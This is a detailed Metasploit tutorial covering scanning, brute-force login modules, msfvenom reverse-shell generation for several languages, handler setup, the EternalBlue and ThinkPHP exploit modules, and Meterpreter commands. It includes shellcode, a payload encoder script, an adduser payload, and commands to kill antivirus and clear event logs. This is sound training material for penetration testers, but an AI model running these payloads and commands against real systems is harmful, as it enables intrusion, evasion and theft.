Metasploit penetration framework super detailed


Explanation of common terms

POC: Proof of Concept, a piece of code that demonstrates a vulnerability exists; it is not meant to cause damage

EXP: Exploit, the code, method or procedure that uses a vulnerability to attack a system; it is offensive by nature

Payload: the code or instructions that actually run on the target after the exploit has succeeded

Shellcode: a piece of machine code (usually written out as hex bytes) that runs once a vulnerability has been exploited; so named because historically its job was to spawn a forward or reverse shell

The next four terms come from Cobalt Strike; they are listed here because operators use them alongside the Metasploit terms:

Client: the operator's client

Team Server: the server, i.e. the C2 server that controls Beacon payloads

Beacon: the payload Cobalt Strike runs on the target host; Beacon provides a covert channel for long-term control of the compromised host

C2: short for Command & Control, the command and control server

Introduction to MSF

MSF is short for The Metasploit Framework. It is highly modular, meaning the framework is assembled from many independent modules, and it is one of the most widely used penetration testing tools in the world.

It is an open source vulnerability exploitation and testing tool that bundles exploits for common vulnerabilities and shellcode for many platforms, and it is updated continuously.

Metasploit covers the whole penetration testing process: within one framework you can use the existing exploit and payload modules to carry out a complete test.

MSF framework structure

Kali-metasploit framework directory path

/usr/share/metasploit-framework


  1. data: editable data files used by Metasploit: binaries needed by certain exploits, wordlists, images, etc.
  2. documentation: documentation for the framework.
  3. lib: the framework's Ruby libraries.
  4. plugins: Metasploit plugins (loaded with the load command, e.g. wmap).
  5. scripts: Metasploit scripts, including the legacy Meterpreter scripts.
  6. tools: assorted command-line utilities.
  7. modules: the module files (exploits, auxiliary, payloads, post, encoders, nops, evasion).

Updating Metasploit on Kali

msfconsole -v          # show the installed version
apt-get update
apt-get install metasploit-framework

MSF configuration database

Metasploit uses a PostgreSQL database to store the hosts, services, credentials and other data collected during a penetration test

Start the PostgreSQL service

service postgresql start

Initialize the MSF database

msfdb init

On Kali this does the following:

Creates a database user: msf
Creates a database: msf
Creates a database: msf_test
Writes the configuration file: /usr/share/metasploit-framework/config/database.yml
Creates the tables the framework needs to store its data

start msfconsole

msfconsole


msfconsole is the Metasploit framework's user interface; every module in Metasploit can be used from it.

msfconsole is mainly used to:

  1. Manage the Metasploit database
  2. Manage sessions
  3. Configure and launch Metasploit modules

When msfconsole starts, MSF automatically connects to the msf database as the msf user created by msfdb init

View database connection status

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

Connect to another database

msf6 > db_connect user:password@host:port/database

MSF command query

Common commands

show exploits        – list all available exploit modules
show auxiliary       – list all available auxiliary modules
[show] options/advanced – show the options (or advanced options) of the current module
show payloads        – list the payloads compatible with the current module
show targets         – list the target types the current module supports
search               – search for modules by keyword
use                  – select a module
info                 – show detailed information about a module
back                 – leave the current module
set/unset            – set or clear an option of the current module
setg/unsetg          – set or clear a global option that applies to all modules

MSF module introduction

Modules are the units of functionality the framework loads and exposes; every vulnerability test in MSF is carried out by a module.

auxiliary (auxiliary module)

Helpers for the phases around exploitation: port scanning, password brute forcing, vulnerability verification, and so on.

Auxiliary modules gather information about the target before exploitation so that the attack that follows can be more targeted and precise.

Examples: scanning and enumeration of network services, network sweeps, vulnerability scanning, login brute forcing, fuzzing, web crawling, data extraction, etc.

The auxiliary category also holds attacks that need no payload and usually do not give remote control of the target, such as denial-of-service modules.

exploits (exploitation module)

The mainstream exploit code, targeting known vulnerabilities in specific software. Module paths follow the pattern exploits/<platform>/<service or protocol>/<module>.

Exploit modules use a discovered vulnerability or configuration weakness on a remote target to plant and run a payload and so obtain access to the target.

They include remote exploits, local exploits, privilege escalation exploits, client-side exploits, web application exploits, and many others.

payloads (attack load)

The code that runs on the target once the exploit has succeeded, for example a reverse shell.

A payload is the implanted code that runs on the target after a successful exploit, usually to open a control session back to the attacker. In traditional exploit development the payload was just a small piece of shellcode, written in assembly and assembled into machine code for the target's CPU architecture; after the exploit triggers the vulnerability, the hijacked execution flow jumps into this machine code, which performs its single job.

Examples: establishing a Meterpreter session, a reverse shell, executing a command, downloading and executing a program, etc.

post (post-infiltration stage module)

After the exploit has succeeded and a Meterpreter session exists, post modules push further functionality to the target, such as privilege escalation.

Post-exploitation modules run after access is gained: credential and hash dumping, local privilege escalation, backdoor installation, sensitive data collection, tunneling and proxying network traffic, keylogging, screen capture, and many other operations.

encoders (encoder module)

Encoders transform the payload bytes. Their original purpose is to avoid bad characters (such as NUL bytes) that would break delivery; as a side effect they change the payload's byte pattern.

Examples: x86/shikata_ga_nai, x86/call4_dword_xor, x64/xor_dynamic, cmd/powershell_base64. Encoding is not encryption, and the decoder stub is itself signatured, so encoders alone rarely get past current antivirus, NIDS (network intrusion detection systems) or EDR (endpoint detection and response); treat them as a bad-character tool rather than an evasion tool.

evasion (evasion module)

Used to generate payloads intended to slip past endpoint defences ("anti-kill" payloads).

Evasion modules target defences such as antivirus, AppLocker and Software Restriction Policies (SRP). Like the encoders, the stock modules are well known to vendors and usually need customisation before they work.

nops (empty instruction module)

NOP generators produce no-operation instructions that pad the payload to a required size and make its entry point tolerant of small address errors.

NOP modules generate harmless "no-op" instruction sequences, used for padding and as a landing zone ("NOP sled") during exploitation. Adding a NOP region in front of the payload improves the reliability of the attack.

These instructions have no meaningful effect on the program's state. Real modules such as x86/opty2 mix many equivalent instructions rather than emitting only 0x90, so the sled does not look like a run of identical bytes.

When an exploit builds its malicious buffer, the shellcode usually needs a generous landing area in front of it so that an imprecise return address, caused by address randomisation or a miscalculated offset, still lands inside the sled and slides into the shellcode instead of crashing. That is what makes the exploit reliable.

MSF auxiliary scanning module - auxiliary

MSF host discovery

module path

modules/auxiliary/scanner/discovery/

search modules

search auxiliary/scanner/discovery

arp_sweep: enumerates live hosts on the local network segment with ARP requests; it only works from a host in the same broadcast domain and needs raw-socket (root) privileges
udp_sweep: sends probes for common UDP services to detect live hosts and the UDP services they run; it works across routed networks

module use

Using the arp_sweep module

use auxiliary/scanner/discovery/arp_sweep
set RHOSTS xx.xx.xx.xx/24
set THREADS 50
run

After setting the options, enter run to start the scanner

MSF service scan

service scan

Once the open ports are known, dig out the service running on each port

module search

In Metasploit's scanner auxiliary modules, the tools for service scanning and enumeration are usually named
[service_name]_version and [service_name]_login
[service_name]_version: walks the network for hosts that run a given service and further determines the service version
[service_name]_login: runs password guessing against that service

In the MSF console you can type:

search _version

to list all available service version probe modules

In the MSF console you can type:

search _login

to list all service login brute-force modules

Telnet service scan

module search

search scanner/telnet

telnet login brute force
auxiliary/scanner/telnet/telnet_login

telnet version scan
auxiliary/scanner/telnet/telnet_version

module use

use auxiliary/scanner/telnet/telnet_version
set RHOSTS xxx.xxx.xxx/24
set THREADS 100
run

SSH service scan

search scanner/ssh
ssh login brute force
auxiliary/scanner/ssh/ssh_login

ssh public key authentication login
auxiliary/scanner/ssh/ssh_login_pubkey

ssh version scan
auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_version
set RHOSTS xx.xx.xx.x/24
set THREADS 100
run

Oracle database scan

search scanner/oracle

use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS xx.xx.xx.xx/24
set THREADS 50
run

SMB service scan

search scanner/smb
SMB2 protocol detection
auxiliary/scanner/smb/smb2
DCERPC information via named pipes
auxiliary/scanner/smb/pipe_dcerpc_auditor
enumerate SMB shares
auxiliary/scanner/smb/smb_enumshares
enumerate users on the system
auxiliary/scanner/smb/smb_enumusers
SMB login brute force
auxiliary/scanner/smb/smb_login
look up users and groups by SID
auxiliary/scanner/smb/smb_lookupsid
OS / SMB version detection
auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.111
run
hosts -c address,os_flavor    # show what the scan stored in the database (db_hosts is the legacy name of this command)

MSSQL service scan

search scanner/mssql
MSSQL login brute force
scanner/mssql/mssql_login
find MSSQL instances and their details (via the SQL Server Browser service, UDP 1434)
scanner/mssql/mssql_ping
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

FTP scan

search scanner/ftp
ftp version scan
scanner/ftp/ftp_version
ftp anonymous login scan
scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

SMTP scan

search scanner/smtp
smtp user enumeration (VRFY / EXPN / RCPT TO)
auxiliary/scanner/smtp/smtp_enum
smtp version scan
auxiliary/scanner/smtp/smtp_version

SNMP scan

search scanner/snmp
msf> use auxiliary/scanner/snmp/snmp_login    # community string guessing
set RHOSTS 192.168.1.0/24
set THREADS 50
run
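After a port scan you normally have dozens of host/port pairs and repeat the same use / set RHOSTS / set RPORT / set THREADS / run sequence for every [service_name]_version module above. The script below is an added example (not code from the original post or from the Metasploit project): it takes a host inventory, maps each service name to its scanner module following the naming convention, batches hosts per module and port, and emits a resource script you can feed to msfconsole -r. The inventory is constructed for illustration; the module paths are the ones shown in the sections above.

```ruby
# Added example: build a Metasploit resource script (.rc) that runs the
# matching <service>_version scanners for a host/port inventory.
# Run with:  ruby svc_scan.rb > svc_scan.rc && msfconsole -q -r svc_scan.rc

# Constructed inventory, as you would get from a port scan or `services -o`.
INVENTORY = [
  { host: '192.168.1.10', port: 22,   name: 'ssh' },
  { host: '192.168.1.11', port: 22,   name: 'ssh' },
  { host: '192.168.1.11', port: 445,  name: 'smb' },
  { host: '192.168.1.12', port: 21,   name: 'ftp' },
  { host: '192.168.1.13', port: 9999, name: 'unknown' }, # no scanner -> skipped
].freeze

# Service name -> version scanner, following the
# auxiliary/scanner/<service>/<service>_version convention.
# All of these take a TCP RPORT, so hosts can be batched per port.
VERSION_MODULES = {
  'ssh'    => 'auxiliary/scanner/ssh/ssh_version',
  'telnet' => 'auxiliary/scanner/telnet/telnet_version',
  'ftp'    => 'auxiliary/scanner/ftp/ftp_version',
  'smb'    => 'auxiliary/scanner/smb/smb_version',
  'smtp'   => 'auxiliary/scanner/smtp/smtp_version',
}.freeze

# Group targets as { module => { port => [hosts] } }.
# RPORT is a single option per run, so hosts are batched per port.
def group_targets(inventory, modules = VERSION_MODULES)
  groups = Hash.new { |h, k| h[k] = Hash.new { |h2, k2| h2[k2] = [] } }
  inventory.each do |entry|
    mod = modules[entry[:name]] or next          # unknown service: nothing to run
    groups[mod][entry[:port]] |= [entry[:host]]  # |= keeps each host once
  end
  groups
end

# Emit msfconsole commands: one use/set/run block per (module, port).
def build_resource_script(inventory, threads: 10, modules: VERSION_MODULES)
  lines = ['# generated service-version scan', 'workspace -a svc_scan']
  group_targets(inventory, modules).each do |mod, by_port|
    by_port.each do |port, hosts|
      lines << "use #{mod}"
      lines << "set RHOSTS #{hosts.join(' ')}"   # RHOSTS accepts a space-separated list
      lines << "set RPORT #{port}"
      lines << "set THREADS #{threads}"
      lines << 'run'
    end
  end
  lines << 'services'   # print what the scanners recorded in the database
  lines.join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  puts build_resource_script(INVENTORY)
end
```

Because every module writes its results into the database, the trailing services command shows the versions it found, and the same inventory can later be re-mapped to the corresponding _login modules for password guessing.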

MSF port scan

module path

modules/auxiliary/scanner/portscan/

module search

search scanner/portscan
auxiliary/scanner/portscan/ack
//ACK scan: finds which ports a stateful firewall does not filter; it reports filtered/unfiltered rather than open/closed

auxiliary/scanner/portscan/ftpbounce
//enumerates TCP ports through an FTP server using the FTP bounce technique; modern FTP servers block it, but old systems can still be abused

auxiliary/scanner/portscan/syn
//sends TCP SYN probes to find open ports (half-open scan)

auxiliary/scanner/portscan/tcp
//uses a full TCP connection to decide whether a port is open; the most accurate but the slowest

auxiliary/scanner/portscan/xmas
//a quieter scan that sends FIN, PSH and URG flags and can slip past some simple TCP flag filters

In general the syn scanner is recommended: it is fast and accurate, and because it never completes the handshake it leaves no connection in the target application's logs. It needs raw sockets (run msfconsole as root), and an IDS will still see the SYN burst.

module use

use auxiliary/scanner/portscan/syn
set RHOSTS 10.10.10.10
set THREADS 20
run

WMAP

Web application scanning and vulnerability-finding modules mostly live under modules/auxiliary/, and Metasploit ships a built-in web scanner, WMAP, that drives them

WMAP is a plugin that stores its results in the database, so the database must be connected first; then load the plugin with load wmap

scan with wmap

msf > load wmap
msf > wmap_sites -a http://xx.xx.xx.xx    //add the site to scan
msf > wmap_sites -l                       //list the sites
msf > wmap_targets -t http://xx.xx.xx.xx  //set the added site as the scan target
msf > wmap_run -t                         //show which modules will be used in the scan
msf > wmap_run -e                         //start the scan
msf > vulns                               //show the vulnerabilities found

MSF attack load module - payloads

module path

/usr/share/metasploit-framework/modules/payloads

A payload (attack load) is the code that runs on the target after exploitation; its main job is to establish a stable connection between the target and the attacker's machine, whether that means returning a shell or injecting a larger program such as Meterpreter.

Payload type

singles

Single (stageless) payloads are self-contained: the whole payload is one piece that can be dropped on the target and run directly, for example shell_bind_tcp.

adduser example (singles)

windows/adduser adds a local administrator account by running net user / net localgroup through cmd.exe

search adduser

use payload/windows/adduser     # prefer the full name: "use 4" depends on the order of the search results, which changes between versions

options

set USER admin

set PASS Admin@123

generate

generate -f <format>            # e.g. generate -f c, generate -f raw

Generate an exe program

search adduser

use payload/windows/adduser

generate -f exe -o xxx.exe

stagers

A stager is the small piece of payload whose only job is to set up a stable network connection between the target machine and the attacker machine and hand over to the stage that follows. Stagers are tiny, so they fit into the limited space an exploit leaves after triggering the vulnerability. They all do roughly the same thing and fall into two families: bind and reverse. A bind stager listens on the target and the attacker connects in; a reverse stager connects back from the target to the attacker, so the attacker's IP address (LHOST) and port (LPORT) have to be set in advance.

stages

The stage is the payload that does the real work, such as shell or meterpreter. Once the stager has established the connection, the attacker machine sends the stage over it; the stager receives it and transfers control to it. The result is, for example, a shell on the target or a running Meterpreter, so the attacker can type commands locally and control the target.

Meterpreter is itself a payload and, in staged form, needs a stager plus the matching stage. Meterpreter runs in memory and is delivered as a reflectively loaded DLL, so by default it writes nothing to disk; that leaves fewer artifacts for forensics, although the process, its network connection and the default Meterpreter signatures are well known to EDR products.

Stageless payload & Staged payload

Payloads come in two forms, staged and stageless, and the name tells them apart:

Stageless payload: <platform>/[arch]/<single>, e.g. windows/x64/meterpreter_reverse_tcp (underscore between stage and transport)

A stageless Meterpreter is one binary that contains all of Meterpreter and the extensions it needs. The whole payload is compiled into the dropped file, so it is large, but it can be planted on the target and run directly without a second download.

Staged payload: <platform>/[arch]/<stage>/<stager>, e.g. windows/x64/meterpreter/reverse_tcp (slash between stage and stager)

A staged Meterpreter first runs the stager, which establishes the connection between the target and the attacker and then hands execution to the next stage. MSF pairs stager and stage for you: the exploit module plants the short, reliable stager, and when the stager runs it downloads and executes the stage, for example Meterpreter or VNC desktop control, which would be far too large to fit into the exploit itself.

Stageless and staged are like the "big" and "small" webshells (大马 and 小马) of web intrusion: one is fully featured, the other only sets up a connection or command execution and relies on other tools and scripts for the rest.
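The exchange that turns a stager into a full Meterpreter is simple enough to replay on loopback. The script below is an added example and not Metasploit code: the handler side mimics what exploit/multi/handler does for a staged reverse_tcp payload (Metasploit's stager handler prefixes the stage with its length packed as a 32-bit little-endian integer, the Ruby [len].pack('V') idiom), and the client side does what the tiny stager does, read 4 bytes, allocate that much, read the stage, and jump to it. The "stage" here is a constructed byte string, not real Meterpreter, and the jump is replaced by returning the bytes.

```ruby
require 'socket'

# Added example, not Metasploit code: loopback reenactment of the staged
# reverse_tcp hand-off.  A stageless payload never does this exchange; the
# complete payload is already inside the dropped binary.

FAKE_STAGE = ("\x90" * 64 + "\xcc").b.freeze   # constructed stand-in for the stage

# Handler side: accept one connection, send 4-byte LE length + stage,
# return how many bytes were transmitted.
def serve_stage(server, stage)
  conn = server.accept
  conn.write([stage.bytesize].pack('V'))   # same framing as Metasploit's stager handler
  conn.write(stage)
  conn.close
  4 + stage.bytesize
end

# Stager side: read exactly 4 bytes, unpack the length, read that many
# bytes.  IO#read(n) blocks until n bytes arrive or the peer closes.
def fetch_stage(host, port)
  sock = TCPSocket.new(host, port)
  len = sock.read(4).unpack1('V')
  stage = sock.read(len)
  sock.close
  raise "short stage: got #{stage.to_s.bytesize}/#{len}" unless stage && stage.bytesize == len
  stage                                    # a real stager would now jump into this buffer
end

# Run both sides on 127.0.0.1 and return [received_stage, bytes_sent].
def stage_roundtrip(stage = FAKE_STAGE)
  server = TCPServer.new('127.0.0.1', 0)   # port 0: let the OS pick a free port
  port = server.addr[1]
  sent = nil
  t = Thread.new { sent = serve_stage(server, stage) }
  got = fetch_stage('127.0.0.1', port)
  t.join
  server.close
  [got, sent]
end

if __FILE__ == $PROGRAM_NAME
  got, sent = stage_roundtrip
  puts "handler sent #{sent} bytes, stager received a #{got.bytesize}-byte stage"
end
```

Two practical consequences follow from this exchange. The handler's payload setting must match the generated stager exactly (platform, architecture and transport), because it is the handler that supplies the stage. And over plain reverse_tcp the whole stage crosses the network in clear text immediately after the connect, which is a distinctive pattern for network sensors; reverse_https or the EnableStageEncoding option exist to change that.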


Payload generation

Introduction to msfvenom

msfvenom is Metasploit's standalone payload generator (it replaced the older msfpayload and msfencode). It produces a backdoor in the desired format; the backdoor is delivered to and executed on the target, while a matching handler in msfconsole receives the connection.

msfvenom-options

Options:

-p, --payload       the payload to use; "-" reads a custom payload from stdin. Nearly every platform is supported

-l, --list          list the available items; the value can be payloads, encoders, nops, platforms, archs, formats, encrypt or all

-n, --nopsled       prepend a nopsled of the given length to the payload

-f, --format        output format (--list formats shows all of them), e.g. exe, elf, php, raw, c

-e, --encoder       the encoder to use

x86/shikata_ga_nai is the best known encoder and is ranked excellent; its decoder stub and keys are generated randomly on every run (polymorphic). cmd/powershell_base64 is also ranked excellent.

-a, --arch          target architecture, e.g. x86, x64, armle (Android and embedded devices), mips (routers, switches, industrial systems)

--platform          target platform, e.g. windows, linux, osx, android

-s, --space         maximum size of the resulting payload (--encoder-space: maximum size of the encoded payload)

-b, --bad-chars     characters that must not appear in the payload, e.g. '\x00\x0a\x0d'

-i, --iterations    number of times to encode the payload

--smallest          generate the smallest possible payload using all available encoders

-o, --out           save the payload to a file

-c, --add-code      include an additional win32 shellcode file

-x, --template      use a specific executable file as a template

-k, --keep          preserve the template's behaviour and inject the payload as a new thread

-v, --var-name      custom variable name to use in certain output formats (e.g. c, python)

-t, --timeout       seconds to wait when reading the payload from STDIN (default 30, 0 disables)

-h, --help          show help
    --help-formats  show the list of supported output formats
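What -e and -b actually do is easiest to see on a small scale. The script below is an added example, not msfvenom's or any Metasploit encoder's code: a single-byte XOR encoder that chooses a key such that neither the key (it has to be embedded in the decoder stub) nor any encoded byte appears in the bad-character list, and that applies -i style iterations. The decoder stub's machine code is not reproduced; the decode step is done in Ruby to show the round trip. The shellcode is the widely published 23-byte Linux x86 execve("/bin//sh"), which contains the '/' byte that a path filter would mangle.

```ruby
# Added example (not Metasploit code): bad-character avoidance, the job
# that "-e <encoder> -b <badchars> -i <n>" delegates to an encoder module.
# x86/shikata_ga_nai adds a polymorphic decoder stub and additive feedback
# on top of this; the key-selection idea is the same.

# Linux x86 execve("/bin//sh") shellcode, 23 bytes (widely published).
SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" \
            "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80".b.freeze

# Equivalent of msfvenom -b '\x00\x2f': NUL ends C strings, '/' breaks paths.
BAD_CHARS = [0x00, 0x2f].freeze

# Which bad bytes occur in the buffer (deduplicated).
def bad_chars_in(bytes, bad = BAD_CHARS)
  bytes.bytes.select { |b| bad.include?(b) }.uniq
end

# First single-byte key that keeps the key and every output byte clean,
# or nil when no such key exists.
def find_xor_key(payload, bad = BAD_CHARS)
  (1..255).find do |key|
    !bad.include?(key) && payload.bytes.none? { |b| bad.include?(b ^ key) }
  end
end

def xor_bytes(payload, key)
  payload.bytes.map { |b| b ^ key }.pack('C*')
end

# -i N equivalent: N rounds, each with its own key chosen against the
# previous round's output.  Returns [encoded, keys].  Raises when no key
# works, which is the situation msfvenom reports as "No encoder succeeded".
def encode(payload, bad = BAD_CHARS, iterations: 1)
  keys = []
  out = payload
  iterations.times do
    key = find_xor_key(out, bad) or raise "no single-byte key avoids #{bad.inspect}"
    out = xor_bytes(out, key)
    keys << key
  end
  [out, keys]
end

# What the decoder stub does at run time, undoing the rounds in reverse.
def decode(encoded, keys)
  keys.reverse.reduce(encoded) { |buf, key| xor_bytes(buf, key) }
end

if __FILE__ == $PROGRAM_NAME
  hex = ->(bs) { bs.map { |b| format('%02x', b) }.join(' ') }
  puts "bad chars in raw shellcode: #{hex.call(bad_chars_in(SHELLCODE))}"
  enc, keys = encode(SHELLCODE, BAD_CHARS, iterations: 2)
  puts "keys: #{hex.call(keys)}; bad chars after encoding: #{hex.call(bad_chars_in(enc))}"
  puts 'round trip ok' if decode(enc, keys) == SHELLCODE
end
```

Note what this does and does not buy you. The encoded buffer passes the filter, but its size is unchanged plus the stub, and anything that emulates or scans memory after the stub runs sees the original bytes again; that is why the encoders section above treats them as a delivery tool, not an antivirus evasion tool.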

msfvenom generate payload

To generate a payload the two options you always set are -p and -f: -p selects the payload, -f the output format

List all payloads available in MSF

msfvenom -l payloads

List the output formats MSF supports

msfvenom -l formats

List the available platforms

msfvenom -l platforms

Generate a payload in exe format (a bind payload needs no LHOST; the handler connects to the target's LPORT)

msfvenom -p windows/meterpreter/bind_tcp -f exe -o 123.exe

msfvenom usage example

msfvenom generate a Windows executable

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.41.128 lport=5445 -f exe -o 5445.exe

-p windows/x64/meterpreter/reverse_tcp: staged Meterpreter for 64-bit Windows with a reverse TCP stager
lhost=192.168.41.128: the IP address the payload connects back to
lport=5445: the port the payload connects back to
-f exe: produce an exe
-o 5445.exe: save the payload as 5445.exe

msfconsole: start the listener

The handler's payload must be exactly the one msfvenom generated, architecture included; an x86 windows/meterpreter/reverse_tcp handler will not stage a windows/x64/meterpreter/reverse_tcp payload correctly.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.41.128
msf6 exploit(multi/handler) > set lport 5445
msf6 exploit(multi/handler) > run

msfvenom generated payloads (web payloads)

php:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 -f raw > shell.php

aspx (the -a value must match the payload's architecture):
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 -f aspx -o shell.aspx

jsp:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.2 LPORT=4444 -f raw > shell.jsp

war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.2 LPORT=4444 -f war > shell.war

Example (stageless PHP Meterpreter, so the handler payload uses the underscore form):
generate the payload:

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.40.132 lport=5555 -f raw -o shell_.php

Create a listener:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.40.132
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.40.132:5555
[*] Meterpreter session 3 opened (192.168.40.132:5555 -> 192.168.40.142:49419) at 10:54:02 -0400
meterpreter > sysinfo
Computer    : SOURCE-PC
OS          : Windows NT SOURCE-PC 6.1 build 7600
Meterpreter : php/windows

msfvenom generate payload (script payloads)

python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 -f raw > shell.py

PowerShell:
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.2.2 LPORT=4444 -f psh > shell.ps1

bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.2.2 LPORT=4444 -f raw > shell.sh

perl:
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.2.2 LPORT=4444 -f raw > shell.pl

Example:

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.2.2 LPORT=4444 -f psh > shell.ps1

On the target, run it with the execution policy bypassed (the handler uses the same windows/x64/meterpreter_reverse_http payload):

powershell.exe -ExecutionPolicy Bypass -File shell.ps1

MSF exploit module - exploits

module path

/usr/share/metasploit-framework/modules/exploits

Windows - MS17-010

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.3.23
check    # test whether the target is vulnerable without exploiting it
run      # run the exploit

The search also returns auxiliary/scanner/smb/smb_ms17_010, which is the safer way to confirm the vulnerability across a range. EternalBlue's kernel pool grooming can crash an unpatched target (blue screen), so always run check first and agree the risk with the system owner.

Linux - Thinkphp-RCE

search thinkphp


use exploit/unix/webapp/thinkphp_rce
set rhosts xx.xx.xx.xx
set rport xxxx
set srvport xxxxxx    # port of the web server the module starts to serve the payload; the target must be able to reach it
set lhost xx.xx.xx.xx
set lport xxxx
run

Meterpreter extension module

Introduction to meterpreter

Meterpreter is an advanced, dynamic and extensible payload. Put simply, it is an enhanced command shell that exposes Metasploit's functionality on the target.

Meterpreter is an extension of the Metasploit framework that is used as the payload after a successful exploit. When the exploit succeeds, the payload returns a control channel to us: using Meterpreter as the payload yields a Meterpreter shell on the target system.

As a post-exploitation tool the Meterpreter shell has many useful functions: adding a user, hiding activity, opening a shell, obtaining user passwords, uploading files to and downloading files from the remote host, running cmd.exe, capturing the screen, taking remote control, logging keystrokes, removing programs, showing the remote host's system information, listing its network interfaces and IP addresses, and more.

meterpreter features

Metasploit provides Meterpreter builds for the mainstream platforms, including Windows and Linux, on both x86 and x64, as well as implementations in PHP, Python and Java. Meterpreter works purely in memory: it starts quietly, does not need to write to the target's disk, and so leaves few disk artifacts and is harder for classic file-scanning antivirus to spot. It is not invisible: the injected process, its network traffic and the default Meterpreter are well known to EDR and memory scanners. Meterpreter is extended through loadable extensions and, historically, Ruby scripts (now post modules).

enter meterpreter

background: put the current session in the background
sessions -l: list all current sessions
sessions -i id: interact with a session

Common commands

background                      # put the session in the background
exit                            # close the session
help                            # help
sysinfo                         # system and platform information
screenshot                      # take a screenshot
shell                           # drop to a command shell on the target (exit to return)
getlwd                          # show the local working directory
lcd                             # change the local working directory
getwd                           # show the working directory on the target
ls                              # list files and directories
cd                              # change directory
rm                              # delete a file
download C:\\1.txt 1.txt        # download a file
upload /var/www/wce.exe wce.exe # upload a file
search -d c: -f *.doc           # search for files
execute -f cmd.exe -i           # execute a program / command (interactively)
ps                              # list processes
getuid                          # show the user the session runs as
run killav                      # legacy script that tries to kill antivirus processes
run getgui -e                   # legacy script that enables Remote Desktop (today: run post/windows/manage/enable_rdp)

Meterpreter commonly used shells

reverse_tcp

Reverse (call-back) shell over plain TCP

linux/x86/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp

bind_tcp

Forward-connect shell over TCP: the payload listens on the target and the attacker connects in. Used inside internal networks where the target cannot reach the attacker across segments; LHOST is not needed, the handler is given RHOST and LPORT instead

linux/x86/meterpreter/bind_tcp

reverse_http

Reverse connection over HTTP. The transport polls the handler instead of holding a socket open, so it survives dropped connections and passes through web proxies at the cost of some latency; the traffic itself is not encrypted

windows/meterpreter/reverse_http

reverse_https

Same as reverse_http but over TLS, so the traffic is encrypted and blends in with normal HTTPS; prefer it over reverse_http whenever the target can reach the handler on 443

windows/meterpreter/reverse_https

Detailed explanation of meterpreter commands

core commands

?                         – help menu
background                – move the current session to the background
bg                        – alias for background
bgkill                    – kill a background Meterpreter script
bglist                    – list running background scripts
bgrun                     – run a script as a background thread
channel                   – display the active channels
close                     – close a channel
disable_unicode_encoding  – disable encoding of unicode strings
enable_unicode_encoding   – enable encoding of unicode strings
exit                      – terminate the Meterpreter session
help                      – help menu
info                      – show information about a post module
irb                       – open an interactive Ruby shell on the current session
load                      – load one or more Meterpreter extensions
machine_id                – get the MSF ID of the machine attached to the session
migrate                   – migrate the server to another process
pivot                     – manage pivot listeners
pry                       – open the pry debugger on the current session
quit                      – terminate the Meterpreter session
read                      – read data from a channel
resource                  – run the commands stored in a file
run                       – execute a Meterpreter script or post module
secure                    – negotiate TLV packet encryption on the session
sessions                  – quickly switch to another session
set_timeouts              – set the current session's timeout values
sleep                     – force Meterpreter to go quiet, then re-establish the session
transport                 – change the current transport mechanism
use                       – load a Meterpreter extension (deprecated alias for load)
uuid                      – get the UUID of the current session
write                     – write data to a channel

file system commands

cat         - read a file's contents and print them to stdout
cd          - change directory on the victim
checksum    - retrieve the checksum of a file
cp          - copy source to destination
dir         - list files (alias for ls)
download    - download a file or directory
edit        - edit a file
getlwd      - print the local working directory
getwd       - print the working directory on the target
lcd         - change the local working directory
lls         - list local files
lpwd        - print the local working directory
ls          - list the files in the current directory
mkdir       - create a directory
mv          - move source to destination
rm          - delete the specified file
rmdir       - remove a directory
search      - search for files on the target file system, e.g. search -d c:\\ -f *.doc searches the target's C: drive for Word documents
show_mount  - list all mount points / logical drives
upload      - upload a file or directory

network commands

arp         - display the host's ARP cache
getproxy    - display the current proxy configuration
ifconfig    - display key information about the network interfaces
ipconfig    - display key information about the network interfaces
netstat     - display network connections
portfwd     - forward a local port to a service on the remote side
              e.g. portfwd add -l 1122 -p 3389 -r 192.168.250.176 makes port 3389 of 192.168.250.176 (reachable from the target) available on local port 1122
resolve     - resolve a set of host names on the target
route       - view or modify the victim's own routing table. Note that the pivoting command route add 5.5.5.0 255.255.255.0 1 (send traffic for 5.5.5.0/24 through session 1) is the msfconsole route command, typed after backgrounding the session; the Meterpreter route command only changes the victim's table

system commands

clearev     - clear the event logs
drop_token  - drop any active impersonation token
execute     - run a program on the target, e.g. execute -f notepad.exe runs Notepad on the target; add -H to run it hidden in the background
getenv      - get one or more environment variable values
getpid      - get the current process ID (PID)
getprivs    - attempt to enable all privileges available to the current process
getsid      - get the SID of the user the server is running as
getuid      - get the user the server is running as
kill        - terminate a process
localtime   - display the target system's local date and time
pgrep       - list processes by name
pkill       - terminate processes by name
ps          - list running processes
